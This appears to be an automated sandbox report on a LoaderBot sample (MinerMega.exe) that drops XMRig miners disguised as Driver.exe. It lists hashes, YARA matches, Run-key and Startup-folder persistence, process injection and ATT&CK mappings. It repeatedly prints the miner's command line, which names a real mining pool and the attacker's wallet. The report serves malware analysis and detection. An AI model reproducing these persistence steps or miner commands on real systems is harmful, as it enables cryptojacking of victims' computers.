loaderbot | 69bef682277aa8ed7ffdb645a8e41d1f1d279380cc799256132d0cac50582890

General

Target

$1/1337/MinerMega.exe
Size

4.0MB
MD5

d1f8ccf271359d1d1840075b3065cdaa
SHA1

5b316201fb5d9705e20398ded7d0441962e2b183
SHA256

5817eb190e2adfb6b1a8488df5e83cda619969a4ea5cccca282a348ef35d09ad
SHA512

5fb53f967b940f76b9c98d09773bea69c6ccbfd2469b9eb64868042f2ee56860d8a000b469ce941a2241adbe261ace43273c9a6cef9821ff6eabeb8f63b81e07
SSDEEP

49152:ENDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:SzP88fBsnZTgOtqB3m1RC3

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 2 IoCs

Processes:

resource	yara_rule
behavioral5/memory/816-0-0x0000000000860000-0x0000000000C5E000-memory.dmp	loaderbot
behavioral5/memory/816-9-0x00000000069F0000-0x0000000007565000-memory.dmp	loaderbot

XMRig Miner payload 13 IoCs

miner

Processes:

resource	yara_rule
behavioral5/memory/2848-12-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1140-17-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1508-23-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1584-28-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/2388-33-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1640-39-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/2868-44-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1864-50-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1864-51-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/2596-57-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/2596-58-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1808-65-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1696-70-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Drops startup file 1 IoCs

Processes:

MinerMega.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url MinerMega.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	MinerMega.exe

Executes dropped EXE 11 IoCs

Processes:

Driver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exeDriver.exe

pid	process
2848	Driver.exe
1140	Driver.exe
1508	Driver.exe
1584	Driver.exe
2388	Driver.exe
1640	Driver.exe
2868	Driver.exe
1864	Driver.exe
2596	Driver.exe
1808	Driver.exe
1696	Driver.exe

Loads dropped DLL 1 IoCs

Processes:

MinerMega.exe

pid process

816 MinerMega.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

MinerMega.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\MinerMega.exe"	MinerMega.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

MinerMega.exe

pid	process
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

MinerMega.exe

pid process

816 MinerMega.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

MinerMega.exe

description pid process

Token: SeDebugPrivilege 816 MinerMega.exe

description	pid	process
Token: SeDebugPrivilege	816	MinerMega.exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

MinerMega.exe

description	pid	process	target process
PID 816 wrote to memory of 2848	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2848	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2848	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2848	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1140	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1140	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1140	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1140	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1508	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1508	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1508	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1508	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1584	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1584	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1584	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1584	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2388	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2388	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2388	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2388	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1640	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1640	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1640	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1640	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2868	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2868	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2868	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2868	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1864	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1864	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1864	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1864	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2596	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2596	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2596	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 2596	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1808	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1808	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1808	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1808	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1696	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1696	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1696	816	MinerMega.exe	Driver.exe
PID 816 wrote to memory of 1696	816	MinerMega.exe	Driver.exe

C:\Users\Admin\AppData\Local\Temp\$1\1337\MinerMega.exe
"C:\Users\Admin\AppData\Local\Temp\$1\1337\MinerMega.exe"
1⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:816

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:2848

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:1140

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:1508

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:1584

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:2388

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:1640

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:2868

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:1864

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:2596

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:1808

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
2⤵
- Executes dropped EXE
PID:1696

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
23KB

MD5
0d8a5653359d08d70a9bca51e5a5bf32

SHA1
d10a55b49255d34813820619127cb2e36f3a8d19

SHA256
0e7de589288e671fe15a2ae205bab3abe9d5dca8a816564dcb202382fb0e7aca

SHA512
b553b39d62024e922f0edeb79daf7f5c853111e50c588557dfdce3c945c980a58a38d0a9a95f0c6854482e2cc31582efad1fd4f3d0c87de262dcc143d39d6032

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
8KB

MD5
093df6b15b51526681d732720a8518ac

SHA1
a99cc1b662d7010535537d725e7721ef2b4a7786

SHA256
fd5d031ce87ab6c5af39858d3116d5dc43e48359b05360cf14687dded99237ba

SHA512
562e7ddb0541c3261bdd5eb67a03428eec3780588050c54f1c238d157aa58070d11394675a8a12398ad8febaf0626609c116766eacf73d6b31a5f51651665ef9

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
448KB

MD5
d4465bdbf3318f335e080f71074fa0bf

SHA1
1dd8c3e85ef13f4ce0df7c44ba5f92e0bfaa0b1d

SHA256
e24d3959f769fe7ab76b9f2f05603393b28c0897191238e56536ad2852057531

SHA512
3ac347553cc468e633a0a44a09e848e840c17a64c14f8ee3be34ea3777e7edc8943bb8b0bbe21f15a228b7fa8e5937baafca0cdb92313f848f9a5bf7560f6406

Download Submit
\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
memory/816-9-0x00000000069F0000-0x0000000007565000-memory.dmp

Filesize
11.5MB

Download
memory/816-59-0x00000000069F0000-0x0000000007565000-memory.dmp

Filesize
11.5MB

Download
memory/816-55-0x0000000000800000-0x0000000000840000-memory.dmp

Filesize
256KB

Download
memory/816-48-0x0000000074300000-0x00000000749EE000-memory.dmp

Filesize
6.9MB

Download
memory/816-0-0x0000000000860000-0x0000000000C5E000-memory.dmp

Filesize
4.0MB

Download
memory/816-4-0x0000000000800000-0x0000000000840000-memory.dmp

Filesize
256KB

Download
memory/816-1-0x0000000074300000-0x00000000749EE000-memory.dmp

Filesize
6.9MB

Download
memory/1140-17-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1508-21-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1508-23-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1584-28-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1640-38-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1640-39-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1696-70-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1808-64-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1808-65-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1864-50-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1864-51-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2388-33-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2596-71-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2596-57-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2596-58-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2848-12-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2848-11-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2848-10-0x00000000001F0000-0x0000000000204000-memory.dmp

Filesize
80KB

Download
memory/2868-44-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads